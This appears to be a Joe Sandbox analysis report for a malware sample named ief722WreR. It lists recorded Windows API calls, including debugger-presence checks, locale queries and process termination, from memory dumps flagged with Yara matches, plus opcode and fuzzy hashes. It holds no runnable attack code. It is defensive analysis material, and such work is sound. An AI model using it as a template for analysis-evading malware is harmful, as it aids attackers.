                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,024B0A23,00000000,024B0B43), ref: 024BB494
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3676976121.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2480000_ief722WreR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_free
                                                      • String ID:
                                                      • API String ID: 2444527052-0
                                                      • Opcode ID: a8d3268dc8615bf56593139fe4b4cdd8dd771f7aacb6be947116ef161c46c3e3
                                                      • Instruction ID: 3e2dc4b3e3bc5437148a8995ba2605b51944cf371a231a3a81260aeb0f76472d
                                                      • Opcode Fuzzy Hash: a8d3268dc8615bf56593139fe4b4cdd8dd771f7aacb6be947116ef161c46c3e3
                                                      • Instruction Fuzzy Hash: 2C61A371A10606AADB26AB75DC45BFB73A9FF04718F14442FED099B280EBB4D541CBB0
                                                      APIs
                                                        • Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
                                                        • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
                                                        • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52
                                                        • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F39
                                                        • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F46
                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0043B449
                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0043B49A
                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0043B55A
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd
                                                      Similarity
                                                      • API ID: ErrorInfoLastLocale$_free
                                                      • String ID:
                                                      • API String ID: 2834031935-0
                                                      • Opcode ID: b47dfc7cc7d128076792c5fbd0b190a68a95fbe03c58a2560eecab0ba078b5b3
                                                      • Instruction ID: c49451ec2ca19e0a4411bfa9fc43b71b3add14360d4f89f5b475bf5440394a21
                                                      • Opcode Fuzzy Hash: b47dfc7cc7d128076792c5fbd0b190a68a95fbe03c58a2560eecab0ba078b5b3
                                                      • Instruction Fuzzy Hash: D561A771501207AFEB289F25CC82BBA77A8EF08714F10507BEE05CA681E77DD951CB99
                                                      APIs
                                                      • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 0042A4CB
                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 0042A4D5
                                                      • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 0042A4E2
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd
                                                      Similarity
                                                      • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                      • String ID:
                                                      • API String ID: 3906539128-0
                                                      • Opcode ID: e3c43158b2ba7ac08fb42c40ba6f83f67e70d04cde29a4d11da33e8c3fa8252c
                                                      • Instruction ID: 57e1c3994b5eabbb9df0cdc6b85fdffdc982c490f91e1a39e2279c764f1972c3
                                                      • Opcode Fuzzy Hash: e3c43158b2ba7ac08fb42c40ba6f83f67e70d04cde29a4d11da33e8c3fa8252c
                                                      • Instruction Fuzzy Hash: C231D6749112289BCB21DF64D9887CDB7B8BF08710F5042EAE81CA7250EB749F958F49
                                                      APIs
                                                      • IsDebuggerPresent.KERNEL32(?,?,?,?,?,0248DAD7), ref: 024AA732
                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,0248DAD7), ref: 024AA73C
                                                      • UnhandledExceptionFilter.KERNEL32(-00000328,?,?,?,?,?,0248DAD7), ref: 024AA749
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3676976121.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2480000_ief722WreR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                      • String ID:
                                                      • API String ID: 3906539128-0
                                                      • Opcode ID: eb826f4c1f6c2a36f22102285c1cba4b775e3ea8ac7ebf58b950a08133c1f654
                                                      • Instruction ID: c90aa944017c9d2be00a89346e304bdbf72c33aae30d3cec3e4f8b656447afc0
                                                      • Opcode Fuzzy Hash: eb826f4c1f6c2a36f22102285c1cba4b775e3ea8ac7ebf58b950a08133c1f654
                                                      • Instruction Fuzzy Hash: 4E31C57590132C9BCB21DF69DD88B9DBBB8BF18710F5042EAE40CA7260E7309B858F44
                                                      APIs
                                                      • GetCurrentProcess.KERNEL32(00000003,?,0042FE35,00000003,00457970,0000000C,0042FF8C,00000003,00000002,00000000,?,0042DFBF,00000003), ref: 0042FE80
                                                      • TerminateProcess.KERNEL32(00000000,?,0042FE35,00000003,00457970,0000000C,0042FF8C,00000003,00000002,00000000,?,0042DFBF,00000003), ref: 0042FE87
                                                      • ExitProcess.KERNEL32 ref: 0042FE99
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd
                                                      Similarity
                                                      • API ID: Process$CurrentExitTerminate
                                                      • String ID:
                                                      • API String ID: 1703294689-0
                                                      • Opcode ID: 5e7a358d5f0fcd19f7a1f5c916dd47094927e45ce0fce04ddfdee5a2d3ebffdf
                                                      • Instruction ID: 8c82726c098bb25b52c6af08a7b8273a11ccbc153eb778ed9611e77f52f83783
                                                      • Opcode Fuzzy Hash: 5e7a358d5f0fcd19f7a1f5c916dd47094927e45ce0fce04ddfdee5a2d3ebffdf
                                                      • Instruction Fuzzy Hash: B3E04635100148ABCF126F50ED08A5A3B39FF09B56F810439F8068B236CB39EE42CA88
                                                      APIs
                                                      • GetCurrentProcess.KERNEL32(00000000,?,024B009C,00000000,00457970,0000000C,024B01F3,00000000,00000002,00000000), ref: 024B00E7
                                                      • TerminateProcess.KERNEL32(00000000,?,024B009C,00000000,00457970,0000000C,024B01F3,00000000,00000002,00000000), ref: 024B00EE
                                                      • ExitProcess.KERNEL32 ref: 024B0100
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3676976121.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2480000_ief722WreR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Process$CurrentExitTerminate
                                                      • String ID:
                                                      • API String ID: 1703294689-0
                                                      • Opcode ID: 5e7a358d5f0fcd19f7a1f5c916dd47094927e45ce0fce04ddfdee5a2d3ebffdf
                                                      • Instruction ID: 95932424b35fdc48ef32caea22904eb5f79d0b41f21831d588972a229f0582b9
                                                      • Opcode Fuzzy Hash: 5e7a358d5f0fcd19f7a1f5c916dd47094927e45ce0fce04ddfdee5a2d3ebffdf
                                                      • Instruction Fuzzy Hash: 59E04631000148ABCF126F58DD48A8A3B6AEF02B43F008029F9048B230CB36DA42DE60
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3676976121.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2480000_ief722WreR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: .$GetProcAddress.$l
                                                      • API String ID: 0-2784972518
                                                      • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                      • Instruction ID: 8cdf4942245fb07499dfcbfde2d2b629970e6a449e81b357afbaf2dd344a87d1
                                                      • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                      • Instruction Fuzzy Hash: 1A314AB6920609DFDB11DF99C880AAEBBF9FF48324F15504AD841A7310D771EA49CFA4
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: /
                                                      • API String ID: 0-2043925204
                                                      • Opcode ID: 9f35882ade819549731607cbebdcf7e443c3af80474b374bb13d2dd880a55ca5
                                                      • Instruction ID: b1d1c733bd69e792f2c7091433d2a564ecb1a1065cd437496777377bd66813c7
                                                      • Opcode Fuzzy Hash: 9f35882ade819549731607cbebdcf7e443c3af80474b374bb13d2dd880a55ca5
                                                      • Instruction Fuzzy Hash: 1A412B725003196FCB20AFB9DC49EBBB778EB88714F50566EF905D7280EA34AD41CB58
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3676976121.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2480000_ief722WreR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: /
                                                      • API String ID: 0-2043925204
                                                      • Opcode ID: 214cb01e33ec6b9459e4b79cb8e50baccc65f9bab5c6278872b1ce9ffd0fa8ee
                                                      • Instruction ID: ef7cfa2c2ca28fde2ac285df64f04ce911cd4a5a5425e5492c23fff357f6b6b8
                                                      • Opcode Fuzzy Hash: 214cb01e33ec6b9459e4b79cb8e50baccc65f9bab5c6278872b1ce9ffd0fa8ee
                                                      • Instruction Fuzzy Hash: 6E411576900219AECB209FB9CC88EEB77BDEF80715F14466AE905D7280E7319D81CB60
                                                      APIs
                                                      • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,00430213,?,00000004), ref: 00435213
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd
                                                      Similarity
                                                      • API ID: InfoLocale
                                                      • String ID: GetLocaleInfoEx
                                                      • API String ID: 2299586839-2904428671
                                                      • Opcode ID: 64730f8190c419499ef2262387837ca1d33de23438e6729a1ee39c968f658f2e
                                                      • Instruction ID: 6c622d5e0ad0a6d1c05e93c1424bc95a701370efe176ef79413d4e55be9de99b
                                                      • Opcode Fuzzy Hash: 64730f8190c419499ef2262387837ca1d33de23438e6729a1ee39c968f658f2e
                                                      • Instruction Fuzzy Hash: 97F02B31680318BBDB016F51CC02F6F7B21EF18B02F10006BFC0567290DA799E20AADE
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3676976121.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2480000_ief722WreR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 0f0c45cb1db73e70c4158069b4bc17042fea2514ea4053169c41fd5e4a69dae0
                                                      • Instruction ID: 2217916c504f1f1d1b273bf3e4caba0a0b36402970917dedf2fb6aebb3c01604
                                                      • Opcode Fuzzy Hash: 0f0c45cb1db73e70c4158069b4bc17042fea2514ea4053169c41fd5e4a69dae0
                                                      • Instruction Fuzzy Hash: C7022D71E012199FDF14CFA9C9906AEBBF1EF98314F15826AD919E7380D731A945CF80
                                                      APIs
                                                      • NtdllDefWindowProc_W.NTDLL(?,?,?,?), ref: 0248262C
                                                      • PostQuitMessage.USER32(00000000), ref: 024827CA
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3676976121.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2480000_ief722WreR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: MessageNtdllPostProc_QuitWindow
                                                      • String ID:
                                                      • API String ID: 4264772764-0
                                                      • Opcode ID: e934076550e84698602cd97162307a7d632c652edc7a108d85d40228a86a25f4
                                                      • Instruction ID: f0261b97a0c40fe91b5043467f19790d747a5e6a9800cc3e9b6adf87d4469498
                                                      • Opcode Fuzzy Hash: e934076550e84698602cd97162307a7d632c652edc7a108d85d40228a86a25f4
                                                      • Instruction Fuzzy Hash: 07412125964384A5E731FFA5BC45B2637B0FF64B26F10252BD528CB2B2E3B28540C75E
                                                      APIs
                                                      • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00436CBA,?,?,00000008,?,?,0043F17B,00000000), ref: 00436EEC
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd
                                                      Similarity
                                                      • API ID: ExceptionRaise
                                                      • String ID:
                                                      • API String ID: 3997070919-0
                                                      • Opcode ID: 48238cf6710726b9619f53d2e144ba1457a585c9b7e66ee0334f1f17764c4bba
                                                      • Instruction ID: 64e3da0580c1687aacde15a9aed21cd267913b72937e2db5c37d982a735c0e1f
                                                      • Opcode Fuzzy Hash: 48238cf6710726b9619f53d2e144ba1457a585c9b7e66ee0334f1f17764c4bba
                                                      • Instruction Fuzzy Hash: 69B17D35210609EFD714CF28C48AB657BE0FF09324F26D659E899CF2A1C339E992CB44
                                                      APIs
                                                      • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,024B6F21,?,?,00000008,?,?,024BF3E2,00000000), ref: 024B7153
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3676976121.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2480000_ief722WreR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ExceptionRaise
                                                      • String ID:
                                                      • API String ID: 3997070919-0
                                                      • Opcode ID: 48238cf6710726b9619f53d2e144ba1457a585c9b7e66ee0334f1f17764c4bba
                                                      • Instruction ID: 2c4f3313a7d70be27a4a72d45cf7591d85ca2a479e0586fbe5880f57e6a85a08
                                                      • Opcode Fuzzy Hash: 48238cf6710726b9619f53d2e144ba1457a585c9b7e66ee0334f1f17764c4bba
                                                      • Instruction Fuzzy Hash: 00B150325106089FD716CF28C486BA5BBE1FF45368F25865AE89ACF3A1C335D992CF50
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3676143282.0000000000AF9000.00000040.00000020.00020000.00000000.sdmp, Offset: 00AF9000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_af9000_ief722WreR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: "~=
                                                      • API String ID: 0-2564214703
                                                      • Opcode ID: e1cdae3e91137000f2f7a12cfec0716f0b2a7225700adeaa942323143ea5ec27
                                                      • Instruction ID: cb3127284ff060da3dccbfc5e6bd904f0007fe0bc7c71d894d8262838d19fd72
                                                      • Opcode Fuzzy Hash: e1cdae3e91137000f2f7a12cfec0716f0b2a7225700adeaa942323143ea5ec27
                                                      • Instruction Fuzzy Hash: ADB187B29593925FCB228F78CC965A97FF0EE6332435806DED5E08B493D3249947CB81
                                                      APIs
                                                        • Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
                                                        • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
                                                        • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52
                                                        • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F39
                                                        • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F46
                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0043B699
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast$_free$InfoLocale
                                                      • String ID:
                                                      • API String ID: 2955987475-0
                                                      • Opcode ID: 7810810a637c9db15668f97de096a3c7ef99c71437c6b6a4b8ea3eac9e26399b
                                                      • Instruction ID: d046272b768734764790121d12bbe36070ecd09619f9604c2cd6a0fe40238023
                                                      • Opcode Fuzzy Hash: 7810810a637c9db15668f97de096a3c7ef99c71437c6b6a4b8ea3eac9e26399b
                                                      • Instruction Fuzzy Hash: B421B67251020AABDB249E65CC42BBB73A8EF48314F10107BFE01D6281EB79DD44CB99
                                                      APIs
                                                        • Part of subcall function 024B2141: GetLastError.KERNEL32(?,?,024AA9EC,?,00000000,?,024ACDE6,0248247E,00000000,?,00451F20), ref: 024B2145
                                                        • Part of subcall function 024B2141: _free.LIBCMT ref: 024B2178
                                                        • Part of subcall function 024B2141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024B21B9
                                                        • Part of subcall function 024B2141: _free.LIBCMT ref: 024B21A0
                                                        • Part of subcall function 024B2141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024B21AD
                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 024BB900
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3676976121.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2480000_ief722WreR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorLast$_free$InfoLocale
                                                      • String ID:
                                                      • API String ID: 2955987475-0
                                                      • Opcode ID: 8d1e0dff99db69fa77e1a690083a2ab2b0404bead7d8da99940a9befd189831e
                                                      • Instruction ID: 3e58ed383412d02b6093fc32fb4da5b0817d2288ecdfd0a8e0b2537ca30c963a
                                                      • Opcode Fuzzy Hash: 8d1e0dff99db69fa77e1a690083a2ab2b0404bead7d8da99940a9befd189831e
                                                      • Instruction Fuzzy Hash: ED218E3295020AABDF26AE29DC41BFA77ADEF08318F10017BED01D6250EB799945CB60
                                                      APIs
                                                        • Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
                                                        • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
                                                        • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52
                                                      • EnumSystemLocalesW.KERNEL32(0043B3F5,00000001,00000000,?,004307B5,?,0043BA22,00000000,?,?,?), ref: 0043B33F
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast$EnumLocalesSystem_free
                                                      • String ID:
                                                      • API String ID: 2016158738-0
                                                      • Opcode ID: 209f9151615a4c87f00d4ea0f4f536091c38e7646036be2875dd2bb4f2ddf691
                                                      • Instruction ID: 7307f244e070286786186ca11be292e9958ff85af34fd5d1bf47ea8df294ed07
                                                      • Opcode Fuzzy Hash: 209f9151615a4c87f00d4ea0f4f536091c38e7646036be2875dd2bb4f2ddf691
                                                      • Instruction Fuzzy Hash: D91106362007019FDB189F3988917BBB791FF84318F15452DEA8687B40D375A902C784
                                                      APIs
                                                        • Part of subcall function 024B2141: GetLastError.KERNEL32(?,?,024AA9EC,?,00000000,?,024ACDE6,0248247E,00000000,?,00451F20), ref: 024B2145
                                                        • Part of subcall function 024B2141: _free.LIBCMT ref: 024B2178
                                                        • Part of subcall function 024B2141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024B21B9
                                                      • EnumSystemLocalesW.KERNEL32(0043B3F5,00000001,00000000,?,024B0A1C,?,024BBC89,00000000,?,?,?), ref: 024BB5A6
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3676976121.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2480000_ief722WreR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorLast$EnumLocalesSystem_free
                                                      • String ID:
                                                      • API String ID: 2016158738-0
                                                      • Opcode ID: ffafb835184771a8fee8a968cb960d5e6389dd898606227e18ebf87d931cb5f8
                                                      • Instruction ID: 7e515b8481e1f4e6acfecb63905f49a3f367a1b8ffb0b433585ee7fb32156f02
                                                      • Opcode Fuzzy Hash: ffafb835184771a8fee8a968cb960d5e6389dd898606227e18ebf87d931cb5f8
                                                      • Instruction Fuzzy Hash: 6111E53A2007059FDB199F39C8A16BBBB92FF8475CB15482EDE8687B40D771B942CB50
                                                      APIs
                                                        • Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
                                                        • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
                                                        • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52
                                                      • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,0043B613,00000000,00000000,?), ref: 0043B8A1
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast$InfoLocale_free
                                                      • String ID:
                                                      • API String ID: 787680540-0
                                                      • Opcode ID: d4489b39268ae4454a785e185639656f72d6012a52ca4bd703596e7082c16f5e
                                                      • Instruction ID: 37b951b57323e1638715454beaabcd8ff4bbdb448c8d666509202632d17d74d0
                                                      • Opcode Fuzzy Hash: d4489b39268ae4454a785e185639656f72d6012a52ca4bd703596e7082c16f5e
                                                      • Instruction Fuzzy Hash: 72F0F932910115BFDB2C6A6588057BB776CEF44764F15542FEE05A3280EB39FE4287D8
                                                      APIs
                                                        • Part of subcall function 024B2141: GetLastError.KERNEL32(?,?,024AA9EC,?,00000000,?,024ACDE6,0248247E,00000000,?,00451F20), ref: 024B2145
                                                        • Part of subcall function 024B2141: _free.LIBCMT ref: 024B2178
                                                        • Part of subcall function 024B2141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024B21B9
                                                      • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,024BB87A,00000000,00000000,?), ref: 024BBB08
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3676976121.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2480000_ief722WreR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorLast$InfoLocale_free
                                                      • String ID:
                                                      • API String ID: 787680540-0
                                                      • Opcode ID: 211d6faacd7aebbddaf1521eced52ad029ab4ad6bdece50ad0f57ab5ad071f03
                                                      • Instruction ID: 22e2ff09c2b26448e486839dd22a166a8aee82b80c065b84543dbf6df423df52
                                                      • Opcode Fuzzy Hash: 211d6faacd7aebbddaf1521eced52ad029ab4ad6bdece50ad0f57ab5ad071f03
                                                      • Instruction Fuzzy Hash: B5F0F932A141156BDB299A29CC45BFB7758EF4071CF04046ADD05A3644EB70FE42CAE0
                                                      APIs
                                                        • Part of subcall function 024B2141: GetLastError.KERNEL32(?,?,024AA9EC,?,00000000,?,024ACDE6,0248247E,00000000,?,00451F20), ref: 024B2145
                                                        • Part of subcall function 024B2141: _free.LIBCMT ref: 024B2178
                                                        • Part of subcall function 024B2141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024B21B9
                                                        • Part of subcall function 024B2141: _free.LIBCMT ref: 024B21A0
                                                        • Part of subcall function 024B2141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024B21AD
                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 024BB900
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3676976121.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2480000_ief722WreR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorLast$_free$InfoLocale
                                                      • String ID:
                                                      • API String ID: 2955987475-0
                                                      • Opcode ID: d32582cdea7e1768c45f561c62b89e044e33708acaf6235ec9442aa70aeaeee6
                                                      • Instruction ID: 4874e0f95e83d3b1db8e53096fb058bde8b60cfc21e2aa9fb6e959dd9512313b
                                                      • Opcode Fuzzy Hash: d32582cdea7e1768c45f561c62b89e044e33708acaf6235ec9442aa70aeaeee6
                                                      • Instruction Fuzzy Hash: 3C014432B512049BCB15EF38DC80AFA73A9DF08311F0442BFEE02DB281EA759D048B60
                                                      APIs
                                                        • Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
                                                        • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
                                                        • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52
                                                      • EnumSystemLocalesW.KERNEL32(0043B645,00000001,?,?,004307B5,?,0043B9E6,004307B5,?,?,?,?,?,004307B5,?,?), ref: 0043B3B4
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast$EnumLocalesSystem_free
                                                      • String ID:
                                                      • API String ID: 2016158738-0
                                                      • Opcode ID: ff4b281e18efaa19658e03831a8d75929bd5cd68572c305843f6b1aa6eea9166
                                                      • Instruction ID: e409c1f6f572afb8e53c6bef185f66c51efc5fed4ad0f11af6fa15d84cefb54f
                                                      • Opcode Fuzzy Hash: ff4b281e18efaa19658e03831a8d75929bd5cd68572c305843f6b1aa6eea9166
                                                      • Instruction Fuzzy Hash: 84F022362007045FDB159F3ADC91B6A7B90EF84328F15442EFE028B680D7B5AC028684
                                                      APIs
                                                        • Part of subcall function 024B2141: GetLastError.KERNEL32(?,?,024AA9EC,?,00000000,?,024ACDE6,0248247E,00000000,?,00451F20), ref: 024B2145
                                                        • Part of subcall function 024B2141: _free.LIBCMT ref: 024B2178
                                                        • Part of subcall function 024B2141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024B21B9
                                                      • EnumSystemLocalesW.KERNEL32(0043B645,00000001,?,?,024B0A1C,?,024BBC4D,024B0A1C,?,?,?,?,?,024B0A1C,?,?), ref: 024BB61B
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3676976121.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2480000_ief722WreR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorLast$EnumLocalesSystem_free
                                                      • String ID:
                                                      • API String ID: 2016158738-0
                                                      • Opcode ID: be0c1418a5537eaa7c8022095862ccd701d6029552e7400e1215369425bfd1f6
                                                      • Instruction ID: 605a5bdb758170fdeb429ac795dbbfafa2a361accdca591ab408f29a21a6ed8b
                                                      • Opcode Fuzzy Hash: be0c1418a5537eaa7c8022095862ccd701d6029552e7400e1215369425bfd1f6
                                                      • Instruction Fuzzy Hash: F7F0C2363007045FDB265F39DC81BBA7B95EF8076CF15442EFE058B650D7B19C028A64
                                                      APIs
                                                      • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,024B047A,?,00000004), ref: 024B547A
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3676976121.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2480000_ief722WreR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: InfoLocale
                                                      • String ID:
                                                      • API String ID: 2299586839-0
                                                      • Opcode ID: 07f8c7bf41114017428d2514f108cb7953daff0745a9299ad745c6acdc6e13f2
                                                      • Instruction ID: cc8a1ba2b889b976d33af3994c7ba25a8026f038811202c10f4acefb457fe579
